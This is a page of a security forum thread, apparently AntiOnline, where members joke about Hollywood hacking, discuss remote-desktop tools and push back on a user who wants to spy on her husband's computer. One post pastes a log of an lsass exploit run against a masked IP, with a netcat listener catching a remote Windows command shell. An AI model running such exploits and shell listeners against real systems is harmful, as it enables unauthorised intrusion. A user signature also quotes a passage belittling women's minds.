Page 2 of 3 FirstFirst 123 LastLast

Thread: Thru The Hacker's Eyes

You guys are all wrong.

When I uber l33t haxor a computer it shows me nice 3 dimensional rectangles representing the file system (See Hackers)

Virii are cross platform and cross language. Why once I flew up to a big space ship where I used a floppy disk to infect an alien species computer system and stop them taking over the earth. The virus resulted in a nice 3d spinning skull effect on the aliens screens.

It also infected all the neighbouring space craft. (I think they were using wi-fi or bluetooth)

Watch the movie "hackers". Its SO just like that... *grin* lol
    that movie is a classic... *roll*
    Remember -
    The ark was built by amatures...
    The Titanic was built by professionals.

dammit, I see, looking above me, someone thought of it too and posted just before me ... lol
    ah well, GMTA.
    Remember -
    The ark was built by amatures...
    The Titanic was built by professionals.

uhm markboyle, all alien species run Mandrake LInux, DUH! If you were wondering the code for the virus he sent was

#import os, os.path, send
    print "JOO R T3H SUXXORZZZ!!!!"
    print "c:\rotating skull"
    os.rmtree("t3h boxxorz!!!!")
    send.to.alien.ships("KABOOM WILL SMITH IS t3H HOTTNESS!!!11")
    Even if your plane crashed tonight you\'d find some way to disappoint by not burning in the wreckage or drowning at the bottom of the sea

C:\>lsass 0 xx.xxx.x.xx 112 xx.xxx.xx.xx
    shellcode size 316
    Ret value = 1727

C:\>nc.exe -vlp 112
    listening on [any] 112 ...
    connect to [xx.xxx.xx.xx] from crap.fr [xx.xxx.x.xx] 1479
    Microsoft Windows 2000 [Version 5.00.2195]
    © Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

AO's Resident Redneck The Texan's Avatar
    well the hacker/cracker could be using something like netbus or dameware and actually see YOUR desktop on HIS...
    Git R Dun - Ty
    A tribe is wanted

AO Ancient: Team Leader
    Texan: RDP, Terminal Services, (same thing, I know), Netmeeting, PCAnywhere, Carbon Copy..... etc. etc. etc... can do that too......

The simple answer really is that, depending upon the tool used.... as goes the 'view'. You may never see anything, (just send commands and see results - or not in some cases), all the way to seeing you work on the computer without knowing they are there.... Hell.... I do that at work..... Odd activity attracts my attention..... So I VNC into the offending machine and watch what the user is doing.... They have no clue I'm there..... BTW, it _clearly_ states in our AUP that I can do this if I want to..... but who reads those pesky AUP's.....
    Don\'t SYN us.... We\'ll SYN you.....
    \"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides

KMAX here,
    I would like to know how I can see on my computer what is on my husbands.
    Is that possible?

AFLAAACKKK!!
    Why must you spy on him? If you want a legitimate answer your going to have to supply good reasons.
    I am the uber duck!!1
    Proxy Tools

AO Ancient: Team Leader
    kmax:

Asking a question in a thread then not answering it and asking a similar question in another thread isn't going to get you what you need..... Honestly.... There are people here that can help and will help..... Motive is _big_ here..... We are security oriented.... We don't tend to assist people with questionable motives..... We consider that bad.... To date all we know about the situation is that you are spying on a potentially innocent party behind his back for no apparent reason..... It's not a pleasant thing but the world and life are not always pleasant.... We understand that too....

Do yourself a favor..... Go back to your original thread and answer these questions....

1. What information, exactly, about your husband are you trying to determine.
    2. Why do you feel the need to determine this information.
    3. What benefit do you expect by knowing what your husband is doing.

Those are fair questions to ask. Answer them fairly and you will find the assistance you need....

Is that acceptable to you?
    Don\'t SYN us.... We\'ll SYN you.....
    \"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides